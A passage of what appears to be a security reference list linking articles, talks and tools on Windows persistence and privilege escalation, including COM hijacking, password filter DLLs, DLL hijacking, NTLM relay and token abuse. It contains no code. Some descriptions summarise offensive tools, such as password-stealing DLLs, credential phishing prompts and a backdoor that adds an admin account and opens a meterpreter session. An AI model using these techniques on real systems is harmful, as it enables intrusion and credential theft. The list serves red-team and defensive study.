- Temporal Persistence with bitsadmin and schtasks /userland-persistence-with-scheduled-tasks-and-com-handler-hijacking/)
- Talks/Presentations/Videos
- Tools
-
Articles/Blogposts/Writeups
-
Boot or Logon Autostart Execution
- Windows Startup Application Database
- Windows Program Automatic Startup Locations(2004) BleepingComputer
- Authentication Package
- Kernel Modules and Extensions
- LSASS Driver
- GPO
- Port Monitors
- Plist Modification
- Re-opened Applications
- Registry Run Keys / Startup Folder
- Security Support Provider
- Shortcut Modification
- Time Providers
- Winlogon Helper DLL
-
Boot or Logon Initialization Scripts
- Browser Extensions
- Logon Script (Mac)
- Logon Script (Windows)
- Network Logon Script
- Rc.common
- Startup Items
- Compromise Client Software Binary
-
Create Account
- Local Account
- Domain Account
- Cloud Account
-
Create or Modify System Process
- Launch Agent
- Systemd Service
- Windows Service
- Launch Daemon
-
Drivers
-
Windows Firewall Hook Enumeration
- We’re going to look in detail at Microsoft Windows Firewall Hook drivers from Windows 2000, XP and 2003. This functionality was leveraged by the Derusbi family of malicious code to implement port-knocking like functionality. We’re going to discuss the problem we faced, the required reverse engineering to understand how these hooks could be identified and finally how the enumeration tool was developed.
-
Windows Firewall Hook Enumeration
-
Event Triggered Execution
- .bash_profile and .bashrc
- Accessibility Features
- AppCert DLLs
-
AppInit DLLs
-
Articles/Blogposts/Writeups
- AppInit_DLLs in Windows 7 and Windows Server 2008 R2 - docs.ms
-
AppInit DLLs and Secure Boot - docs.ms
- Starting in Windows 8, the AppInit_DLLs infrastructure is disabled when secure boot is enabled.
- Alternative psexec: no wmi, services or mof needed - Diablohorn
-
Articles/Blogposts/Writeups
-
Application Shimming
-
Articles/Blogposts/Writeups
- Windows Persistence using Application Shimming - Kavish Tyagi(2020)
- Post Exploitation Persistence With Application Shims (Intro)
- Shimming for Post Exploitation(blog)
- Demystifying Shims – or – Using the App Compat Toolkit to make your old stuff work with your new stuff
- Post Exploitation Persistence With Application Shims (Intro)
- Shim Database Talks
- Using Application Compatibility Shims
- Persistence via Shims - liberty-shell
-
Tools
-
Windows 0wn3d By Default - Mark Baggett(Derbycon2013)
- Description: “In this talk we will discuss API Hooking, Process Execution Redirection, Hiding Registry keys and hiding directories on the hard drive. We must be talking about rootkits, right? Well yes, but not in the way you think. The Windows family of operating systems has all of these capabilities built right in! Using nothing but tools and techniques distributed and documented by Microsoft we can implement all of these rootkit functions. During this exciting talk I will present new attacks against Windows operating system that provide rootkit like functionality with built-in OS tools. In session, we’ll demonstrate how to leverage the Microsoft Application Compatibility Toolkit to help hide an attacker’s presence on your system. The Application Compatibility Toolkit allows you to create application shims that intercept and redirect calls from applications to the operating system. This native rootkit like capability is intended to make the Windows operating system compatible with very old or poorly written applications. Do DEP, ASLR, UAC, and Windows Resource Protection, File system ACLS and other modern OS security measures get it your way? No problem. Turn them off! Do you want to hide files and registry keys and from the user? The Application Compatibility toolkit allows you to create a virtual world for any application and hide resources from view. If someone inspects the registry with regedit they will see exactly what the attacker wants them to see and not what the OS sees when it launches programs. Did they patch your target so your exploit doesn’t work? Guess what, making applications backwards compatible is what this tool is intended to do. Make your favorite applications “old exploit compatible” insuring you can re-exploit the target with this awesome untapped resource. Everything you need to subvert windows applications is built right into the windows kernel. Come learn how to use the application compatibility toolkit to tap this great resource.”
-
Windows 0wn3d By Default - Mark Baggett(Derbycon2013)
-
Articles/Blogposts/Writeups
-
Change Default File Association
- Registering an Application to a URI Scheme - docs.ms
-
Exploiting custom protocol handlers in Windows - Andrey Polkovnychenko
- In this article we would like to present the mechanism for custom protocol handling in Windows, and how it can be exploited using a simple command injection vulnerability.
-
Component Object Model Hijacking
- COM Object hijacking: the discreet way of persistence
- Userland Persistence with Scheduled Tasks and COM Handler Hijacking
- How To Hunt: Detecting Persistence & Evasion With The COM - Blake Strom
- Persistence: “the continued or prolonged existence of something”: Part 2 – COM Hijacking - MDSec
- Use COM Object hijacking to maintain persistence——Hijack CAccPropServicesClass and MMDeviceEnumerator - 3gstudent
- Use COM Object hijacking to maintain persistence——Hijack explorer.exe - 3gstudent
-
Activation Contexts — A Love Story - Philip Tsukerman(2019)
- TL;DR — Windows loads a version of the Microsoft.Windows.SystemCompatible assembly manifest into every process. Tampering with it lets you inject DLL side-loading opportunities into every process, and to perform COM hijacking without touching the registry. Unfortunately, the manifest could be replaced by another version, possibly killing your persistence by surprise.
- Emond
- Event Log
- Image File Execution Options Injection
- LC_LOAD_DYLIB Addition
- Netsh Helper DLL
-
PowerShell-relatd
-
Articles/Blogposts/Writeups
-
Using and Abusing Aliases with PowerShell - notoriousrebel.space
- Shimming Aliases with PowerShell
-
Using and Abusing Aliases with PowerShell - notoriousrebel.space
-
Tools
-
Remapper
- PowerShell script that will shim aliases throughout PowerShell sessions through the use of PowerShell profiles.
-
p0shkiller(2016)
- Proof of Concept exploit to bypass Microsoft latest AntiMalware Scan Interface technology within PowerShell5 on Windows 10. With this exploit/patch applied, you can take control over powershells program flow by using DLL Hijacking and UAC Bypasstechniques. Every time powershell is started, a local admin named BadAss with password FacePalm01 will be added to the system (when run by an non elevated administrator account) and a reverse (SYSTEM) https meterpreter session (default 192.168.1.120) will be started every hour using a scheduled task.
-
Remapper
-
Articles/Blogposts/Writeups
- Screensaver
- Trap
- Windows Management Instrumentation Event Subscription
- External Remote Services
- Filesystem
-
Hijack Execution Flow
- COR_PROFILER
- DLL Search Order Hijacking
- DLL Side-Loading
- Dylib Hijacking
- Executable Installer File Permissions Weakness
- Implant Container Image
- LD_PRELOAD
- Path Interception by PATH Environment Variable
- Path Interception by Search Order Hijacking
- Path Interception by Unquoted Path
- Services File Permissions Weakness
- Services Registry Permissions Weakness
- Implant Container Image
-
MS Distributed Transaction Coordinator Service
-
Articles/Blogposts/Writeups
- Distributed Transaction Coordinator - docs.ms
- The Microsoft Distributed Transaction Coordinator service must run under the NT AUTHORITY\NetworkService Windows account - support.ms
- Shadow Force Uses DLL Hijacking, Targets South Korean Company - Dove Chiu(2015)
- Use msdtc to maintain persistence - 3gstudent
-
Articles/Blogposts/Writeups
- LAPS
-
Library Files
-
101
-
Windows libraries - docs.ms
- Libraries are virtual containers for users’ content. A library can contain files and folders stored on the local computer or in a remote storage location. In Windows Explorer, users interact with libraries in ways similar to how they would interact with other folders. Libraries are built upon the legacy known folders (such as My Documents, My Pictures, and My Music) that users are familiar with, and these known folders are automatically included in the default libraries and set as the default save location.
-
Windows libraries - docs.ms
- Articles/Blogposts/Writeups
-
101
-
.NET
-
Articles/Blogposts/Writeups
-
Common Language Runtime Hook for Persistence - Paul Laine
- This blog post explains how it is possible to execute arbitrary code and maintain access to a Microsoft Windows system by leveraging the Common Language Runtime application domain manager.
-
CLR-Persistence
- Use CLR to inject all the .NET apps
- Using CLR to maintain Persistence
- SharPersist: Windows Persistence Toolkit in C# - Brett Hawkins
-
Common Language Runtime Hook for Persistence - Paul Laine
-
Tools
-
SharPersist
- Windows persistence toolkit written in C#
-
SharPersist
- AppDomain
-
Articles/Blogposts/Writeups
- Netsh Helper DLL
-
Office Applications
- Articles/Blogposts/Writeups
- Add-ins
- Extensibility Features
-
Office Template Macros
-
One Template To Rule 'Em All - Kostas Lintovois
- Introduction of wePWNize
-
One Template To Rule 'Em All - Kostas Lintovois
- Outlook Forms
- Outlook Rules
- Outlook Home Page
- Office Test
-
Password Filter DLL
-
101
-
Password Filters - docs.ms
- Password filters provide a way for you to implement password policy and change notification.
- AD Password Filters - ldapwiki
-
Installing and Registering a Password Filter DLL - docs.ms
- You can use the Windows password filter to filter domain or local account passwords. To use the password filter for domain accounts, install and register the DLL on each domain controller in the domain.
- Installing and Registering a Password Filter DLL - msdn.ms
-
PSAM_PASSWORD_NOTIFICATION_ROUTINE callback function - docs.ms
- The PasswordChangeNotify function is implemented by a password filter DLL. It notifies the DLL that a password was changed.
-
Password Filters - docs.ms
-
Articles/Blogposts/Writeups
- Capture password change at active directory controller - StackOverflow(2013)
- How a Windows Password Filters Works - NFront(2014)
- Stealing passwords every time they change - carnal0wnage(2013)
- Intercepting Password Changes With Function Hooking - clymb3r(2013)
- T1174: Password Filter - @spottheplanet
-
Throwing it out the Windows: Exfiltrating Active Directory credentials through DNS - Leanne Dutil
- This post will detail the password filter implant project we developed recently. Our password filter is used to exfiltrate Active Directory credentials through DNS. This text will discuss the technicalities of the project as well as my personal experience developing it.
- Dump-Clear-Text-Password-after-KB2871997-installed - 3gstudent
- Domain Penetration-Hook PasswordChangeNotify – Three Good Students
- Talks/Presentations/Videos
-
Tools
-
DLLPasswordFilterImplant
- DLLPasswordFilterImplant is a custom password filter DLL that allows the capture of a user's credentials. Each password change event on a domain will trigger the registered DLL in order to exfiltrate the username and new password value prior successfully changing it in the Active Directory (AD).
-
OpenPasswordFilter
- OpenPasswordFilter is an open source custom password filter DLL and userspace service to better protect / control Active Directory domain passwords.
-
PasswordStealing
- Password stealing DLL I have written about 1999, some time before Active Directory was announced. And of course it still works. First, it was written in 32-bit Delphi (pardon my language) and when it stopped working as everything changed into 64-bit - in (so much simpler when it comes to Win32 API) C, as I did not have 64-bit Delphi. The original implementation was a bit more complex, including broadcasting the changed password over the network etc. but now it works as a demonstration of an idea, so let's keep it as simple as possible. It works everywhere - on local machines for local accounts and on DCs for domain accounts.
-
DLLPasswordFilterImplant
-
101
-
Pre-OS Boot
- System Firmware
- Component Firmware
- Bootkit
-
Registry
- Windows Registry Attacks: Knowledge Is the Best Defense
- Windows Registry Persistence, Part 1: Introduction, Attack Phases and Windows Services
- Windows Registry Persistence, Part 2: The Run Keys and Search-Order
- List of autorun keys / malware persistence Windows registry entries
- How to Evade Detection: Hiding in the Registry - David Lu
- Persistence – Registry Run Keys - NetbiosX
-
InvisiblePersistence
- Persisting in the Windows registry "invisibly". Whitepaper and POC
-
Scheduled Task/Job
-
At (Windows)
-
Scheduled Task
-
Sc
- Communicates with the Service Controller and installed services. The SC.exe program provides capabilities similar to those provided in Services in the Control Panel.
- schtasks
-
Script Task
- Persistence Via MSSQL
-
Sc
-
At (Linux)
-
Launchd
-
Cron
-
- ScreenSaver
- Services * Stealthier persistence using new services purposely vulnerable to path interception - Christophe Tafani-Dereeper * Persistence – New Service - NetbiosX
-
Server Software Component
- IIS
- MS-SQL Server
- SQL Stored Procedures
- Transport Agent
- Web Shell
- Third-Party Programs
-
Traffic Signaling
- Port Knocking
-
UEFI
- MIDNIGHTTRAIN
-
Blogpost
- Covert Stage-3 Persistence Framework utilizing NVRAM variables
-
Valid Accounts
- Default Accounts
- Domain Accounts
- Local Accounts
- Cloud Accounts
- VisualStudio
-
WaitFor
- waitfor - docs.ms
-
Persistence – WaitFor - NetbiosX(2020)
- "Waitfor is a Microsoft binary which is typically used to synchronize computers across a network by sending signals. This communication mechanism can be used in a red team operation in order to download and execution arbitrary code and for persistence. The binary is stored in C:\Windows\System32 folder which means that local administrator privileges are required to perform this activity and both hosts (sender and receiver) needs to be on the same network segment. "
- WMI
- WPAD
-
Unsorted
- Quiet in the Windows: Dropping Network Connections - Eviatar Gerzi
-
Tools
- Invisible Persistence
-
DropNet
- A tool that can be used to close network connections automatically with a given parameters
-
Miscellaneous
-
backdoorme
- Tools like metasploit are great for exploiting computers, but what happens after you've gained access to a computer? Backdoorme answers that question by unleashing a slew of backdoors to establish persistence over long periods of time. Once an SSH connection has been established with the target, Backdoorme's strengths can come to fruition. Unfortunately, Backdoorme is not a tool to gain root access - only keep that access once it has been gained.
-
backdoorme
-
Privilege Escalation
-
101
- Windows Privilege Escalation Fundamentals
- Windows Privilege Escalation Methods for Pentesters
- Common Windows Privilege Escalation Vectors
- Windows Privilege Escalation Cheat Sheet/Tricks
- Windows / Linux Local Privilege Escalation Workshop
- Hunting for Privilege Escalation in Windows Environment - Heirhabarov
-
Elevating your Windows Privileges Like a Boss! - Jake Williams(WWHF2019)
- Local privilege escalation on Windows is becoming increasingly difficult. Gone are the days when you could just easily exploit the Windows kernel. Multiple controls (KASLR, DEP, SMEP, etc.) have made kernel mode exploitation of the bugs that are discovered much more difficult. In this talk, we'll discuss multiple opportunities for privilege escalation including using COM objects, DLL side loading, and various privileges assigned to user accounts. Bring a Windows 10 VM. We'll have instructions available for recreating the scenarios demonstrated in the talk.
-
General
- Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw
- Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read - James Forshaw
-
PrivescCheck
- This script aims to enumerate common Windows security misconfigurations which can be leveraged for privilege escalation and gather various information which might be useful for exploitation and/or post-exploitation.
-
Specific Techniques
- Always Install Elevated
-
DLL Stuff
- Creating a Windows DLL with Visual Basic
- Calling DLL Functions from Visual Basic Applications - msdn
-
DLL Hijacking/Plant
-
101
- Dynamic-Link Library Search Order - docs.ms
- Dynamic-Link Library Hijacking
- Crash Course in DLL Hijacking
- VB.NET Tutorial - Create a DLL / Class Library
-
Exploiting DLL Hijacking by DLL Proxying Super Easily
- This is a tutorial about exploiting DLL Hijack vulnerability without crashing the application. The method used is called DLL Proxying.
-
Hijacking DLLs in Windows - Wietze(2020)
- DLL Hijacking is a popular technique for executing malicious payloads. This post lists nearly 300 executables vulnerable to relative path DLL Hijacking on Windows 10 (1909), and shows how with a few lines of VBScript some of the DLL hijacks can be executed with elevated privileges, bypassing UAC.
-
dll-hijack-by-proxying
- This is a tutorial about exploiting DLL Hijack vulnerability without crashing the application. The method used is called DLL Proxying.
-
Articles/Blogposts/Writeups
- Adaptive DLL Hijacking - Nick Landers
- Windows 10 - Task Scheduler service - Privilege Escalation/Persistence through DLL planting - remoteawesomethoughts.blogspot
- DLL Hijacking via URL files - InsertScript
- DLL Hijacking - pentestlab.blog(2017)
- Understanding how DLL Hijacking works - Astr0baby(2018)
- DLL Hijacking - libertyshell.com(2019)
- Lateral Movement — SCM and DLL Hijacking Primer - Dwight Hohnstein(2019)
- Automating DLL Hijack Discovery - Justin Bui(2020)
- UAC bypass through Trusted Folder abuse - Jean Maes(2020)
-
Windows 10 - Task Scheduler service - Privilege Escalation/Persistence through DLL planting - remoteawesomethoughts.blogspot
- I was recently busy doing some reverse on an antivirus solution. During this review, I figured out the Windows 10 Task Scheduler service was looking for a missing DLL exposing it to DLL hijacking/planting. It opens for persistence and privilege escalation in case one can write a rogue DLL in a folder pointed by the PATH environment variable. It can also be used as a UAC bypass.
- Use CLR to bypass UAC - 3gstudent
-
UAC bypass via elevated .NET applications - @clavoillotte(2017)
- TL;DR .NET Framework can be made to load a profiling DLL or a COM component DLL via user-defined environment variables and CLSID registry entries, even when the process is elevated. This behavior can be exploited to bypass UAC in default settings on Windows 7 to 10 (including the latest RS3 builds) by making an auto-elevate .NET process (such as MMC snap-ins) load an arbitrary DLL.
-
.NET Profiler DLL Hijack
- The .NET Framework can be coerced into loading a profiling DLL into any .NET assembly when launched. This is done when a handful of environment variables and registry keys are set. For a full write-up you can view this blog here: https://offsec.provadys.com/UAC-bypass-dotnet.html
-
Tools
-
Siofra
- DLL hijacking vulnerability scanner and PE infector tool
-
DLLSpy
- DLLSpy is a that detects DLL hijacking in running processes, services and in their binaries.
-
Robber
- Robber is open source tool for finding executables prone to DLL hijacking
-
Koppeling
- This project is a demonstration of advanced DLL hijack techniques. It was released in conjunction with the "Adaptive DLL Hijacking" blog post. I recommend you start there to contextualize this code.
- TrustJack
- HijackHunter
-
Siofra
-
101
-
DLL Tools
-
rattler
- Rattler is a tool that automates the identification of DLL's which can be used for DLL preloading attacks.
-
injectAllTheThings
- Single Visual Studio project implementing multiple DLL injection techniques (actually 7 different techniques) that work both for 32 and 64 bits. Each technique has its own source code file to make it easy way to read and understand.
-
Pazuzu
- Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. This can be useful in various scenarios.
-
Bleak
- A Windows native DLL injection library written in C# that supports several methods of injection.
-
rattler
-
Exploits/Missing Patches
- Windows Kernel Exploits - NetbiosX
- kernel-exploits - SecWiki
- MS17-010 (Eternal Blue)
- CVE-2018-8140
- CVE-2019-0841
- CVE-2019-1064
- CVE-2019-1069
- CVE-2019–1082
- CVE-2020-0618
- CVE-2020-0787
-
CVE-2020-0796
-
CVE-2020-0796
- Windows SMBv3 LPE Exploit
- CVE-2020-0796 Windows SMBv3 LPE Exploit POC Analysis - Sung Lin(2020)
- Exploiting SMBGhost (CVE-2020-0796) for a Local Privilege Escalation: Writeup + POC - Zecops(2020)
- CVE-2020-0796 | Windows SMBv3 Client/Server Remote Code Execution Vulnerability - portal.msrc
- I'm SMBGhost, daba dee daba da - Lucas Georges(2020)
- CVE-2020-0796 Memory Corruption Vulnerability in Windows 10 SMB Server - Yije Wang(2020)
- SMBGhost – Analysis of CVE-2020-0796 - Eoin Carroll, Philippe Laulheret, Kevin McGrath, Steve Povolny(2020)
-
[微软SMBv3客户端/服务端远程代码执行漏洞(CVE-2020-0796)技术分析 - blogs.360.cn](微软SMBv3客户端/服务端远程代码执行漏洞(CVE-2020-0796)技术分析https://blogs.360.cn/post/CVE-2020-0796.html)
- Vulnerability Reproduction: CVE-2020-0796 POC - Zecops
-
CVE-2020-0796
-
CVE-2020-1362
-
Exploiting an Elevation of Privilege bug in Windows 10 (CVE-2020-1362)
- writeup of CVE-2020-1362
-
Exploiting an Elevation of Privilege bug in Windows 10 (CVE-2020-1362)
-
Miscellaneous
-
CVE-2019-1405 and CVE-2019-1322 – Elevation to SYSTEM via the UPnP Device Host Service and the Update Orchestrator Service - Phillip Langlois and Edward Torkington
- This blog post discusses two vulnerabilities discovered by NCC Group consultants during research undertaken on privilege elevation via COM local services. The first of these vulnerabilities (CVE-2019-1405) is a logic error in a COM service and allows local unprivileged users to execute arbitrary commands as a LOCAL SERVICE user. The second vulnerability (CVE-2019-1322) is a simple service misconfiguration that allows any user in the local SERVICE group to reconfigure a service that executes as SYSTEM (this vulnerability was independently also discovered by other researchers). When combined, these vulnerabilities allow an unprivileged local user to execute arbitrary commands as the SYSTEM user on a default installation of Windows 10.
- Thanksgiving Treat: Easy-As-Pie Windows 7 Secure Desktop Escalation Of Privilege - Simon Zuckerbraun
- Docker Desktop for Windows PrivEsc (CVE-2020-11492) - Ceri Coburn(2020)
- Windows Telemetry service elevation of privilege - secret.club(2020)
- CVE-2016-5237: Valve Steam 3.42.16.13 Local Privilege Escalation
-
CVE-2019-1405 and CVE-2019-1322 – Elevation to SYSTEM via the UPnP Device Host Service and the Update Orchestrator Service - Phillip Langlois and Edward Torkington
-
Fax/Printer/Network Service
- Articles/Blogposts/Writeups
-
Tools
-
faxhell ("Fax Shell")
- A Proof-of-Concept bind shell using the Fax service and a DLL hijack based on
Ualapi.dll
.
- A Proof-of-Concept bind shell using the Fax service and a DLL hijack based on
- RpcSsImpersonator
-
faxhell ("Fax Shell")
-
Group Policy (Preferences)
- Get-GPPermission - docs.ms
- Exploiting Windows 2008 Group Policy Preferences
- Decrypting Windows 2008 GPP user passwords using Gpprefdecrypt.py
- Group Policy Preferences and Getting Your Domain 0wned - Carnal0wnage
- Compromise Networks Through Group Policy Preferences - securestate.com(archive.org)
- Group Policy Preferences - NetbiosX
- Credential Dumping: Group Policy Preferences (GPP) - Yashika Dhir(2020)
- Intel SYSRET
-
LAPS Misconfiguration
-
Taking over Windows Workstations thanks to LAPS and PXE - Rémi ESCOURROU
- In this article we will examine how the combination of two good security solutions with no apparent connection to each other can lead to the takeover of all workstations in a Windows environment. The main advantage of this technique is that it is exploitable in black box, i.e. without any prior knowledge of the target.
- Who Can See LAPS Passwords? - David Rowe
- Credential Dumping: LAPS - Kavish Tyagi(2020)
-
Taking over Windows Workstations thanks to LAPS and PXE - Rémi ESCOURROU
-
Local Phishing
-
Articles/Blogposts/Writeups
- Ask and ye shall receive - Impersonating everyday applications for profit - FoxIT
- Phishing for Credentials: If you want it, just ask! - enigma0x3
- Phishing Windows Credentials - NetbiosX
- Credentials Collection via CredUIPromptForCredentials - @spottheplanet
- ICU: A Red Teamer’s Hail Mary - Jean Maes
- Phishing Windows Credentials - NetbiosX(2020)
-
Tools
-
Invoke-CredentialPhisher
- The first one is a powershell script to send toast notifications on behalf on an (installed) application or the computer itself. The user will be asked to supply credentials once they click on the notification toast. The second one is a Cobalt Strike module to launch the phishing attack on connected beacons.
- Powershell Popups + Capture - mubix(2015)
- Invoke-CredentialsPhish.ps1
-
Invoke-LoginPrompt
- Invokes a Windows Security Login Prompt and outputs the clear text password.
-
CredsLeaker
- Credsleaker allows an attacker to craft a highly convincing credentials prompt using Windows Security, validate it against the DC and in turn leak it via an HTTP request.
-
Invoke-CredentialPhisher
-
Articles/Blogposts/Writeups
-
Logic Bugs
- Introduction to Logical Privilege Escalation on Windows - James Forshaw
- Windows Logical EoP Workbook
-
Abusing Token Privileges For EoP
- This repository contains all code and a Phrack-style paper on research into abusing token privileges for escalation of privilege. Please feel free to ping us with questions, ideas, insults, or bugs.
- awesome_windows_logical_bugs
-
Named Pipes
- Discovering and Exploiting Named Pipe Security Flaws for Fun and Profit - Blake Watts(2002)
- Named Pipe Filename Local Privilege Escalation - Securiteam(2003)
- Windows Named Pipes & Impersonation - decoder.cloud(2019)
- Windows NamedPipes 101 + Privilege Escalation - @spottheplanet
- Part I: The Fundamentals of Windows Named Pipes - Robert Hawes
- Part II: Analysis of a Vulnerable Microsoft Windows Named Pipe Application - Robert Hawes
-
Privileged File Operation Abuse
- James Forshaw's work
-
Articles/Blogposts/Writeups
- Windows 10^H^H Symbolic Link Mitigations - James Forshaw(2015)
- Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read - James Forshaw(2017)
- Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw(2018)
-
An introduction to privileged file operation abuse on Windows - @Claviollotte
- TL;DR This is a (bit long) introduction on how to abuse file operations performed by privileged processes on Windows for local privilege escalation (user to admin/system), and a presentation of available techniques, tools and procedures to exploit these types of bugs.
- CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service - Ryan Hanson(2018)
- Escalating Privileges with CylancePROTECT - Ryan Hanson(2018)
- CVE-2020–1088 — Yet another arbitrary delete EoP - Søren Fritzbøger(2020)
-
From directory deletion to SYSTEM shell - Jonas L(2020)
- "Vulnerabilities that enable an unprivileged profile to make a service (that is running in the SYSTEM security context) delete an arbitrary directory/file are not a rare occurrence. These vulnerabilities are mostly ignored by security researchers on the hunt as there is no established path to escalation of privilege using such a primitive technique. By chance I have found such a path using an unlikely quirk in the Windows Error Reporting Service. The technical details are neither brilliant nor novel, though a writeup has been requested by several Twitter users."
- Code
- Weaponizing Privileged File Writes with the USO Service - Part 1/2 - itm4n(2019)
-
DACL Permissions Overwrite Privilege Escalation (CVE-2019-0841) - Nabeel Ahmed(2019)
- This vulnerability allows low privileged users to hijack file that are owned by NT AUTHORITY\SYSTEM by overwriting permissions on the targeted file. Successful exploitation results in "Full Control" permissions for the low privileged user.
-
CVE-2020-1170 - Microsoft Windows Defender Elevation of Privilege Vulnerability - itm4n(2020)
- "Here is my writeup about CVE-2020-1170, an elevation of privilege bug in Windows Defender."
- Talks/Presentations/Videos
-
Tools
-
UsoDllLoader
- This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo), which was fixed by Microsoft starting from build version 1903.
-
UsoDllLoader
-
NTLM-related
- Search "NTLM" in the 'Network_Attacks.md' page.
- Articles/Blogposts/Writeups
-
NTLM Reflection
- Windows: DCOM DCE/RPC Local NTLM Reflection Elevation of Privilege
- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
-
Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema
- Earlier this week, Microsoft issued patches for CVE-2019-1040, which is a vulnerability that allows for bypassing of NTLM relay mitigations. The vulnerability was discovered by Marina Simakov and Yaron Zinar (as well as several others credited in the Microsoft advisory), and they published a technical write-up about the vulnerability here. The short version is that this vulnerability allows for bypassing of the Message Integrity Code in NTLM authentication. The impact of this however, is quite big if combined with the Printer Bug discovered by Lee Christensen and some of my own research that builds forth on the Kerberos research of Elad Shamir. Using a combination of these vulnerabilities, it is possible to relay SMB authentication to LDAP. This allows for Remote code execution as SYSTEM on any unpatched Windows server or workstation (even those that are in different Active Directory forests), and for instant escalation to Domain Admin via any unpatched Exchange server (unless Exchange permissions were reduced in the domain). The most important takeaway of this post is that you should apply the June 2019 patches as soon as possible.
-
CVE-2019-1040 scanner
- Checks for CVE-2019-1040 vulnerability over SMB. The script will establish a connection to the target host(s) and send an invalid NTLM authentication. If this is accepted, the host is vulnerable to CVE-2019-1040 and you can execute the MIC Remove attack with ntlmrelayx. Note that this does not generate failed login attempts as the login information itself is valid, it is just the NTLM message integrity code that is absent, which is why the authentication is refused without increasing the badpwdcount.
-
NTLM Relay
-
Articles/Blogposts/Writeups
- Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes) - byt3bl33d3r
- NTLM Relay - Pixis
- Playing with Relayed Credentials - @agsolino(2018)
- Server Message Block: SMB Relay Attack (Attack That Always Works) - CQURE Academy
- An SMB Relay Race – How To Exploit LLMNR and SMB Message Signing for Fun and Profit - Jordan Drysdale
- Effective NTLM / SMB Relaying - mubix
- SMB Relay with Snarf - Jeff Dimmock
- Responder with NTLM relay and Empire - chryzsh
-
What is old is new again: The Relay Attack - @0xdeaddood, @agsolino(2020)
- The purpose of this blog post is to present a new approach to ntlmrelayx.py allowing multi-relay attacks, that means, using just a single connection to attack several targets. On top of this, we added the capability of relaying connections for specific target users.
- Capturing and Relaying NTLM Authentication: Methods and Techniques - Acebond(2020)
- Mitigation
-
Articles/Blogposts/Writeups
-
Hot Potato
-
Hot Potato
- Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing.
- Hot Potato
- SmashedPotato
-
Hot Potato
-
Ghost Potato
-
Ghost Potato - shenaniganslabs.io(2019)
- Halloween has come and gone, and yet NTLM reflection is back from the dead to haunt MSRC once again. This post describes a deceptively simple bug that has existed in Windows for 15 years. NTLM reflection is still possible through a highly reliable timing attack. The attack works by abusing the logic responsible for its mitigation, a widely speculated challenge cache. Attackers can purge this cache by deliberately failing an authentication attempt and doing so removes all challenge entries older than 5 minutes.
-
Ghost Potato - shenaniganslabs.io(2019)
-
Tools
-
Snarf
- Snarf man-in-the-middle / relay suite
-
eternalrelayx.py — Non-Admin NTLM Relaying & ETERNALBLUE Exploitation - Kory Findley
- In this post, we will cover how to perform the EternalRelay attack, an attack technique which reuses non-Admin SMB connections during an NTLM Relay attack to launch ETERNALBLUE against hosts running affected versions of the Windows operating system. This attack provides an attacker with the potential to achieve remote code execution in the privilege context of SYSTEM against vulnerable Windows hosts without the need for local Administrator privileges or credentials.
-
Responder
- Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
-
Snarf
-
Privilege Abuse
-
Priv2Admin
- Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.
-
Priv2Admin
-
Privileged File Operations
-
101
-
An introduction to privileged file operation abuse on Windows - @clavoillotte(2019)
- TL;DR This is a (bit long) introduction on how to abuse file operations performed by privileged processes on Windows for local privilege escalation (user to admin/system), and a presentation of available techniques, tools and procedures to exploit these types of bugs.
-
An introduction to privileged file operation abuse on Windows - @clavoillotte(2019)
- Articles/Blogposts/Writeups
-
101
-
Registry Paths/Permissions
- Insecure Registry Permissions - NetbiosX
-
RegSLScan
- This tool scans registery keys under Local Machine (HKLM) and lists out any keys non-admins have access to create symbolic links in.
- Services
-
Service Abuse
- Articles/Blogposts/Writeups
-
Tools
-
FullPowers
- FullPowers is a Proof-of-Concept tool I made for automatically recovering the default privilege set of a service account including SeAssignPrimaryToken and SeImpersonate.
-
FullPowers
-
Unquoted Service Paths
- Articles/Blogposts/Writeups
- Tools
- Stored Creds/Passwords on disk
-
Tokens
-
Articles/Blogposts/Writeups
- Abusing Token Privileges For LPE - drone/breenmachine
- Post-Exploitation with “Incognito”. - Ignacio Sorribas
-
The Art of Becoming TrustedInstaller
- There's many ways of getting the TI token other than these 3 techniques. For example as Vincent Yiu pointed out on Twitter if you've got easy access to a system token, say using Metasploit's getsystem command you can impersonate system and then open the TI token, it's just IMO less easy :-). If you get a system token with SeTcbPrivilege you can also call LogonUserExExW or LsaLogonUser where you can specify an set of additional groups to apply to a service token. Finally if you get a system token with SeCreateTokenPrivilege (say from LSASS.exe if it's not running PPL) you can craft an arbitrary token using the NtCreateToken system call.
- c:\whoami /priv - [show me your privileges and I will lead you to SYSTEM] - Andrea Pierini
- Windows: DCOM DCE/RPC Local NTLM Reflection Elevation of Privilege
- Account Hunting for Invoke-TokenManipulation - TrustedSec
- Tokenvator: A Tool to Elevate Privilege using Windows Tokens - Alexander Polce Leary
- Tokenvator: Release 2 - Alexander Leary
- Abusing SeLoadDriverPrivilege for privilege escalation - TarLogic
- The power of backup operators - decoder.cloud
- Token Manipulation
-
Talks & Presentations
-
Social Engineering The Windows Kernel: Finding And Exploiting Token Handling Vulnerabilities - James Forshaw - BHUSA2015
- Slides
